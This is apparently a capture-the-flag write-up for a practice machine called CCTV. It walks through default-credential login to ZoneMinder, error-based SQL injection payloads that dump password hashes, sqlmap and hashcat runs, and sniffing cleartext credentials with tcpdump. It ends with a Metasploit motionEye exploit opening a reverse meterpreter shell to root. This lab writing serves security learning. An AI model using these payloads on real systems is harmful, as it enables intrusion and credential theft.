11 July 2026

CCTV

by 0xW1LD

Initial Enumeration

Scans

As usual we start off with an nmap port scan

1
2
3
4
5
6
7
8
9
10
11
12
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDZ15GCLPzC4gTM0nqzpUbr/2L77bM1C9sbBecivQPX/KcKvJrP88peCJXwTug7T/EORHr7M7JeHtMQJ6hYihFA=
|   256 e3:9b:38:08:9a:d7:e9:d1:94:11:ff:50:80:bc:f2:59 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKitA8JIvpUZg84xCOEAX17k1W9xZDviZdnUrcoPRreb
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.58
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: SecureVision CCTV & Security Solutions
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have the usual linux ports: 22 - OpenSSH on Ubuntu, and 80 - Apache httpd. Let’s visit the http website and take a look.

HTTP Website

Visiting the CCTV website we’re greeted by: Secure Vision, a CCTV monitoring, access control, consultation service. CCTV

Taking a look at the Staff Login we find a ZoneMinder login page. Zone Minder Login Page

Attempting usage of the default credentials: admin:admin logs us in! Zone Minder Admin Panel

User

Manual Error Based SQLi

Looking around we can find the Zone Minder version is v1.37.63, checking for CVEs we can find CVE-2024-51482 a boolean based SQLinjection. However we don’t have to do this blind, instead we can do an Error Based SQLi because in the log tab we can actually see errors so we can do error based SQLi instead.

If we send the following request we get a 500 response.

1
2
3
4
5
6
7
8
9
10
11
12
GET /zm/index.php?view=request&request=event&action=removetag&tid=1%20OR%201%3D1--%20- HTTP/1.1
Host: cctv.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://cctv.htb/zm/index.php?view=log
Cookie: zmControlTable.bs.table.hiddenColumns=%5B%22Id%22%5D; zmLogsTable.bs.table.pageList=500; zmLogsTable.bs.table.pageNumber=27; zmSkin=classic; zmCSS=base; ZMSESSID=6ilfq84s02da2see7isdkdm0iu


However, checking the logs we can see the error

1
2
3/7/26, 11:43:53 PM UTC	web_php	1530	ERR	SQL-ERR 'SQLSTATE[22007]: Invalid datetime format: 1292 Truncated incorrect INTEGER value: '1 OR 1=1-- -'', statement was 'DELETE FROM Tags WHERE Id = ?' params:1 OR 1=1-- -	/usr/share/zoneminder/www/includes/database.php	161
3/7/26, 11:43:53 PM UTC	web_php	1530	ERR	SQL-ERR 'SQLSTATE[22007]: Invalid datetime format: 1292 Truncated incorrect INTEGER value: '1 OR 1=1-- -'', statement was 'DELETE FROM Events_Tags WHERE TagId = ? AND EventId = ?' params:1 OR 1=1-- -,	/usr/share/zoneminder/www/includes/database.php	161

Attempting a simple Error Based injection payload through this request:

1
2
3
4
5
6
7
8
9
10
11
12
GET /zm/index.php?view=request&request=event&action=removetag&tid=1%20AND%20EXTRACTVALUE(1%2CCONCAT(0x7e%2C%40%40version))--%20- HTTP/1.1
Host: cctv.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://cctv.htb/zm/index.php?view=log
Cookie: zmControlTable.bs.table.hiddenColumns=%5B%22Id%22%5D; zmLogsTable.bs.table.pageList=500; zmLogsTable.bs.table.pageNumber=27; zmSkin=classic; zmCSS=base; ZMSESSID=6ilfq84s02da2see7isdkdm0iu


Gets us the following errors

1
2
3/7/26, 11:47:53 PM UTC	web_php	1531	ERR	SQL-ERR 'SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~8.0.45-0ubuntu0.24.04.1'', statement was 'SELECT * FROM Events_Tags WHERE TagId = 1 AND EXTRACTVALUE(1,CONCAT(0x7e,@@version))-- -' params:	/usr/share/zoneminder/www/includes/database.php	161
3/7/26, 11:47:53 PM UTC	web_php	1531	ERR	SQL-ERR 'SQLSTATE[22007]: Invalid datetime format: 1292 Truncated incorrect INTEGER value: '1 AND EXTRACTVALUE(1,CONCAT(0x7e,@@version))-- -'', statement was 'DELETE FROM Events_Tags WHERE TagId = ? AND EventId = ?' params:1 AND EXTRACTVALUE(1,CONCAT(0x7e,@@version))-- -,	/usr/share/zoneminder/www/includes/database.php	161

We can clearly see the value: ~8.0.45-0ubuntu0.24.04.1' after the XPATH syntax error, let’s extract the current database name:

1
2
3
1 AND EXTRACTVALUE(1,CONCAT(0x7e,database()))-- -

~zm

Let’s extract the username and password from the database:

1
2
3
4
5
6
7
8
9
10
11
1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(Username,0x3a,Password) FROM Users LIMIT 0,1)))-- -

~superadmin:$2y$10$cmytVWFRnt1Xf

1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTR(Password,21,100) FROM Users LIMIT 0,1)))-- -

~qsItsJRVe/ApxWxcIFQcURnm5N.rh

1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTR(Password,50,100) FROM Users LIMIT 0,1)))-- -

~lULwM0jrtbm

Combining all these together we get a bcrypt hash.

1
2
3
4
5
$ hashid -m '$2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm'                                                                     
Analyzing '$2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x 
[+] bcrypt [Hashcat Mode: 3200]

Let’s go for the next user following the same sequence.

1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(Username,0x3a,Password) FROM Users LIMIT 1,1)))-- -

~mark:$2y$10$prZGnazejKcuTv5bKNe

1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTR(Password,27,100) FROM Users LIMIT 1,1)))-- -

~xXOgLyQaok0hq07LW7AJ/QNqZolbXKf

1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTR(Password,58,100) FROM Users LIMIT 1,1)))-- -

~FG.

We could do the same for the last user but after the first query we can see that it’s the admin user and we already know admin’s password is admin.

1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(Username,0x3a,Password) FROM Users LIMIT 2,1)))-- -

~admin:$2y$10$t5z8uIT.n9uCdHCNid

Automated Error Based SQLi

Now that we’ve learned how the manual method works, here’s how to configure sqlmap to do it automatically.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
$ sqlmap -u 'http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1' -H "Cookie: zmControlTable.bs.table.hiddenColumns=%5B%22Id%22%5D; zmLogsTable.bs.table.pageList=10; zmLogsTable.bs.table.pageNumber=1; zmSkin=classic; zmCSS=base; ZMSESSID=0bhfbh36rk5feculqivjm4uojr" -p tid --batch --dbms mysql --technique E --second-url 'http://cctv.htb/zm/index.php?view=request&request=log&task=query&search=&offset=0&limit=10' --regexp "XPATH syntax error" -T Users -D zm --dump -v 0                
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.10.2#stable}
|_ -| . [ ]     | . | . |
|___|_  [ ]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:18:07 /2026-03-09/

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
GET parameter 'tid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 6 HTTP(s) requests:
---
Parameter: tid (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: view=request&request=event&action=removetag&tid=1 AND EXTRACTVALUE(9922,CONCAT(0x5c,0x7178706271,(SELECT (ELT(9922=9922,1))),0x717a6a6a71))
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.58
back-end DBMS: MySQL >= 5.1
[01:18:14] [INFO] retrieved: 'APIEnabled'
[01:18:14] [INFO] retrieved: 'tinyint unsigned'
[01:18:14] [INFO] retrieved: 'Control'
[01:18:14] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:14] [INFO] retrieved: 'Devices'
[01:18:14] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:15] [INFO] retrieved: 'Email'
[01:18:15] [INFO] retrieved: 'varchar(64)'
[01:18:15] [INFO] retrieved: 'Enabled'
[01:18:15] [INFO] retrieved: 'tinyint unsigned'
[01:18:15] [INFO] retrieved: 'Events'
[01:18:15] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:15] [INFO] retrieved: 'Groups'
[01:18:15] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:16] [INFO] retrieved: 'HomeView'
[01:18:16] [INFO] retrieved: 'varchar(64)'
[01:18:16] [INFO] retrieved: 'Id'
[01:18:16] [INFO] retrieved: 'int unsigned'
[01:18:16] [INFO] retrieved: 'Language'
[01:18:16] [INFO] retrieved: 'varchar(8)'
[01:18:16] [INFO] retrieved: 'MaxBandwidth'
[01:18:16] [INFO] retrieved: 'varchar(16)'
[01:18:16] [INFO] retrieved: 'Monitors'
[01:18:17] [INFO] retrieved: 'enum('None','View','Edit','Create')'
[01:18:17] [INFO] retrieved: 'Name'
[01:18:17] [INFO] retrieved: 'varchar(64)'
[01:18:17] [INFO] retrieved: 'Password'
[01:18:17] [INFO] retrieved: 'varchar(64)'
[01:18:17] [INFO] retrieved: 'Phone'
[01:18:17] [INFO] retrieved: 'varchar(64)'
[01:18:17] [INFO] retrieved: 'Snapshots'
[01:18:17] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:18] [INFO] retrieved: 'Stream'
[01:18:18] [INFO] retrieved: 'enum('None','View')'
[01:18:18] [INFO] retrieved: 'System'
[01:18:18] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:18] [INFO] retrieved: 'TokenMinExpiry'
[01:18:18] [INFO] retrieved: 'bigint unsigned'
[01:18:18] [INFO] retrieved: 'Username'
[01:18:18] [INFO] retrieved: 'varchar(64)'
[01:18:19] [INFO] retrieved: '1'
[01:18:19] [INFO] retrieved: 'Edit'
[01:18:19] [INFO] retrieved: 'Edit'
[01:18:19] [INFO] retrieved: ''
[01:18:19] [INFO] retrieved: '1'
[01:18:19] [INFO] retrieved: 'console'
[01:18:19] [INFO] retrieved: '1'
[01:18:19] [INFO] retrieved: ''
[01:18:19] [INFO] retrieved: 'Create'
[01:18:20] [INFO] retrieved: '$2y$10$cmytVWFRnt1XfqsItsJRVe\\/ApxWxcIFQcURnm5N.rhlULwM0jrtbm'
[01:18:20] [INFO] retrieved: ''
[01:18:20] [INFO] retrieved: 'Edit'
[01:18:20] [INFO] retrieved: '0'
[01:18:20] [INFO] retrieved: 'superadmin'
[01:18:20] [INFO] retrieved: 'Edit'
[01:18:20] [INFO] retrieved: 'Edit'
[01:18:20] [INFO] retrieved: ''
[01:18:20] [INFO] retrieved: ''
[01:18:21] [INFO] retrieved: 'View'
[01:18:21] [INFO] retrieved: 'Edit'
[01:18:21] [INFO] retrieved: '1'
[01:18:21] [INFO] retrieved: 'Edit'
[01:18:21] [INFO] retrieved: 'Edit'
[01:18:21] [INFO] retrieved: ''
[01:18:21] [INFO] retrieved: '1'
[01:18:21] [INFO] retrieved: 'console'
[01:18:21] [INFO] retrieved: '2'
[01:18:21] [INFO] retrieved: ''
[01:18:21] [INFO] retrieved: 'Create'
[01:18:22] [INFO] retrieved: '$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ\\/QNqZolbXKfFG.'
[01:18:22] [INFO] retrieved: ''
[01:18:22] [INFO] retrieved: 'None'
[01:18:22] [INFO] retrieved: '0'
[01:18:22] [INFO] retrieved: 'mark'
[01:18:22] [INFO] retrieved: 'Edit'
[01:18:22] [INFO] retrieved: 'Edit'
[01:18:22] [INFO] retrieved: ''
[01:18:23] [INFO] retrieved: 'mark'
[01:18:23] [INFO] retrieved: 'View'
[01:18:23] [INFO] retrieved: 'View'
[01:18:23] [INFO] retrieved: '1'
[01:18:23] [INFO] retrieved: 'Edit'
[01:18:23] [INFO] retrieved: 'Edit'
[01:18:23] [INFO] retrieved: ''
[01:18:23] [INFO] retrieved: '1'
[01:18:23] [INFO] retrieved: 'console'
[01:18:23] [INFO] retrieved: '3'
[01:18:24] [INFO] retrieved: ''
[01:18:24] [INFO] retrieved: 'Create'
[01:18:24] [INFO] retrieved: '$2y$10$t5z8uIT.n9uCdHCNidcLf.39T1Ui9nrlCkdXrzJMnJgkTiAvRUM6m'
[01:18:24] [INFO] retrieved: ''
[01:18:24] [INFO] retrieved: 'None'
[01:18:24] [INFO] retrieved: '0'
[01:18:24] [INFO] retrieved: 'admin'
[01:18:24] [INFO] retrieved: 'Edit'
[01:18:24] [INFO] retrieved: 'Edit'
[01:18:25] [INFO] retrieved: ''
[01:18:25] [INFO] retrieved: 'admin'
[01:18:25] [INFO] retrieved: 'View'
[01:18:25] [INFO] retrieved: 'View'
Database: zm
Table: Users
[3 entries]
+----+---------+---------+---------+---------+---------+---------+----------+----------+----------------------------------------------------------------+------------+----------+----------+----------+----------+-----------+------------+------------+--------------+----------------+
| Id | Email   | Phone   | Name    | Control | Devices | Enabled | HomeView | Monitors | Password                                                       | Username   | Events   | Groups   | Stream   | System   | Snapshots | APIEnabled | Language   | MaxBandwidth | TokenMinExpiry |
+----+---------+---------+---------+---------+---------+---------+----------+----------+----------------------------------------------------------------+------------+----------+----------+----------+----------+-----------+------------+------------+--------------+----------------+
| 1  | <blank> | <blank> | <blank> | Edit    | Edit    | 1       | console  | Create   | $2y$10$cmytVWFRnt1XfqsItsJRVe\\/ApxWxcIFQcURnm5N.rhlULwM0jrtbm | superadmin | Edit     | Edit     | View     | Edit     | Edit      | 1          | <blank>    | <blank>      | 0              |
| 2  | <blank> | <blank> | mark    | Edit    | Edit    | 1       | console  | Create   | [REDACTED] | mark       | Edit     | Edit     | View     | View     | None      | 1          | <blank>    | <blank>      | 0              |
| 3  | <blank> | <blank> | admin   | Edit    | Edit    | 1       | console  | Create   | $2y$10$t5z8uIT.n9uCdHCNidcLf.39T1Ui9nrlCkdXrzJMnJgkTiAvRUM6m   | admin      | Edit     | Edit     | View     | View     | None      | 1          | <blank>    | <blank>      | 0              |
+----+---------+---------+---------+---------+---------+---------+----------+----------+----------------------------------------------------------------+------------+----------+----------+----------+----------+-----------+------------+------------+--------------+----------------+


[*] ending @ 01:18:25 /2026-03-09/

Cracking the extracted hashes

Attempting to put the first 2 hashes into hashcat we get a successful crack!

1
2
3
4
$ hashcat -m 3200 -a 0 --username hashes.pem /usr/share/wordlists/rockyou.txt -w 3
<SNIP>

[REDACTED].:[REDACTED]

Checking for password reuse against ssh we’re able to login!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ ssh mark@cctv.htb                 
The authenticity of host 'cctv.htb (10.129.25.226)' can't be established.
ED25519 key fingerprint is: SHA256:KrrHjS+nu1wJEfv1/NxT1fI+ODJaSRdJtFg201G+tO0
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cctv.htb' (ED25519) to the list of known hosts.
mark@cctv.htb's password: 
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.8.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun  8 Mar 00:35:21 UTC 2026

  System load:           0.0
  Usage of /:            74.0% of 8.70GB
  Memory usage:          29%
  Swap usage:            0%
  Processes:             255
  Users logged in:       0
  IPv4 address for eth0: 10.129.25.226
  IPv6 address for eth0: dead:beef::250:56ff:fe95:666b


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

14 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm

mark@cctv:~$

TCPDUMP capabilities

Taking a look around we can find that tcpdump has eip capabilities, meaning the CAP_NET_RAW kernel permission is effective, inheritable, and permitted

1
2
3
4
5
6
7
8
9
mark@cctv:~$ getcap / -r 2>/dev/null
/snap/core22/2292/usr/bin/ping cap_net_raw=ep
/snap/snapd/25935/usr/lib/snapd/snap-confine cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_setgid,cap_setuid,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin=p
/snap/core24/1349/usr/bin/ping cap_net_raw=ep
/usr/lib/snapd/snap-confine cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_setgid,cap_setuid,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin=p
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin,cap_sys_nice=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/tcpdump cap_net_raw=eip
/usr/bin/ping cap_net_raw=ep

Let’s dump a packet capture, I ran it for 2 minutes.

1
2
3
4
5
6
7
mark@cctv:~$ tcpdump -i any -w /tmp/w1ld.pcap -G 120 -W 1
tcpdump: data link type LINUX_SLL2
tcpdump: listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
Maximum file limit reached: 1
12218 packets captured
12475 packets received by filter
0 packets dropped by kernel

Opening this in wireshark and using the filter tcp contains "sa_mark" we’re able to find a cleartext credential being transported.

1
2
USERNAME=sa_mark;PASSWORD=[REDACTED];CMD=status
All CCTV cameras are operational

Attempting to swap to sa_mark we’re able to login!

1
2
3
4
5
6
mark@cctv:~$ su sa_mark
Password: 
$ whoami
sa_mark
$ ls -lash ~/user.txt
4.0K -rw-r----- 1 root sa_mark 33 Mar  8 01:39 /home/sa_mark/user.txt

Just like that, we have User!

Root

motion Eye RCE

Taking a look around we can find a few interesting ports running.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
mark@cctv:~$ ss -tulnp
Netid                   State                    Recv-Q                   Send-Q                                     Local Address:Port                                       Peer Address:Port                   Process                   
udp                     UNCONN                   0                        0                                             127.0.0.54:53                                              0.0.0.0:*                                                
udp                     UNCONN                   0                        0                                          127.0.0.53%lo:53                                              0.0.0.0:*                                                
udp                     UNCONN                   0                        0                                                0.0.0.0:68                                              0.0.0.0:*                                                
tcp                     LISTEN                   0                        4096                                           127.0.0.1:8554                                            0.0.0.0:*                                                
tcp                     LISTEN                   0                        70                                             127.0.0.1:33060                                           0.0.0.0:*                                                
tcp                     LISTEN                   0                        4096                                           127.0.0.1:9081                                            0.0.0.0:*                                                
tcp                     LISTEN                   0                        4096                                             0.0.0.0:22                                              0.0.0.0:*                                                
tcp                     LISTEN                   0                        128                                            127.0.0.1:8765                                            0.0.0.0:*                                                
tcp                     LISTEN                   0                        4096                                       127.0.0.53%lo:53                                              0.0.0.0:*                                                
tcp                     LISTEN                   0                        4096                                           127.0.0.1:8888                                            0.0.0.0:*                                                
tcp                     LISTEN                   0                        4096                                          127.0.0.54:53                                              0.0.0.0:*                                                
tcp                     LISTEN                   0                        151                                            127.0.0.1:3306                                            0.0.0.0:*                                                
tcp                     LISTEN                   0                        4096                                           127.0.0.1:7999                                            0.0.0.0:*                                                
tcp                     LISTEN                   0                        4096                                           127.0.0.1:1935                                            0.0.0.0:*                                                
tcp                     LISTEN                   0                        511                                                    *:80                                                    *:*                                                
tcp                     LISTEN                   0                        4096                                                [::]:22                                                 [::]:* 

The port 8765 is interesting as it’s the motionEye web server.

1
2
3
4
5
6
7
mark@cctv:~$ curl 127.0.0.1:8765 -I
HTTP/1.1 200 OK
Server: motionEye/0.43.1b4
Content-Type: text/html; charset=UTF-8
Date: Sun, 08 Mar 2026 00:58:06 GMT
Etag: "da39a3ee5e6b4b0d3255bfef95601890afd80709"
Content-Length: 0

Port forwarding the port to my localhost we can access the motionEye interface with the sa_mark credentials we found using the username: admin. motionEye

Looking around we can find a motionEye and motion version

1
2
motionEye Version 	0.43.1b4
Motion Version 	4.7.1

Based on this we can find CVE-2025-60787 which has a metasploit module. So let’s use that.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
$ msfconsole                                                                                                                                                  
Metasploit tip: Use help <command> to learn more about any command
                                                  

     .~+P``````-o+:.                                      -o+:.
.+oooyysyyssyyssyddh++os-`````                        ```````````````          `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.`                 .-.-...-////+++++++++++++++////////~~//////++++++++++++///
                                `...............`              `...-/////...`


                                  .::::::::::-.                     .::::::-
                                .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
                                 :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
                                 .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
                                  -Nd`  :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
                                   -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
    `oo/``-hd:  ``                 .sNd  :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
      .yNmMMh//+syysso-``````       -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
    .shMMMMN//dmNMMMMMMMMMMMMs`     `:```-o++++oooo+:/ooooo+:+o+++oooo++/
    `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
          /MMMMMMMMMMMMMMMMMMd.     `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
          -hMMmssddd+:dMMmNMMh.     `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
          .sMMmo.    -dMd--:mN/`           ||--X--||          ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================

                     Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It s always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                        Press SPACE BAR to continue



       =[ metasploit v6.4.112-dev                               ]
+ -- --=[ 2,607 exploits - 1,325 auxiliary - 1,707 payloads     ]
+ -- --=[ 429 post - 49 encoders - 14 nops - 9 evasion          ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

msf > search motioneye

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank       Check  Description
   -  ----                                                  ---------------  ----       -----  -----------
   0  exploit/linux/http/motioneye_auth_rce_cve_2025_60787  2025-09-09       excellent  Yes    Remote Code Execution Vulnerability in MotionEye Frontend (CVE-2025-60787)


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/motioneye_auth_rce_cve_2025_60787

msf > use 0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > show options

Module options (exploit/linux/http/motioneye_auth_rce_cve_2025_60787):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password used to authenticate to MotionEye
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to MotionEye
   USERNAME   admin            yes       The username used to authenticate to MotionEye
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           192.168.177.128  yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      sKkkrImSz        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Unix Command



View the full module info with the info, or info -d command.

msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > set lhost tun0
lhost => 10.10.14.3
msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > set rport 8765
rport => 8765
msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > set password [REDACTED]
password => [REDACTED]
msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > run
[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 0.43.1b4, which is vulnerable
[*] Adding malicious camera...
[+] Camera successfully added
[*] Setting up exploit...
[+] Exploit setup complete
[*] Triggering exploit...
[+] Exploit triggered, waiting for session...
[*] Sending stage (3090404 bytes) to 10.129.25.226
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.129.25.226:60730) at 2026-03-07 20:04:52 -0500
[*] Removing camera
[+] Camera removed successfully

meterpreter > shell
Process 7053 created.
Channel 1 created.
whoami
root

Just like that, we have Root!

tags: os/linux - diff/easy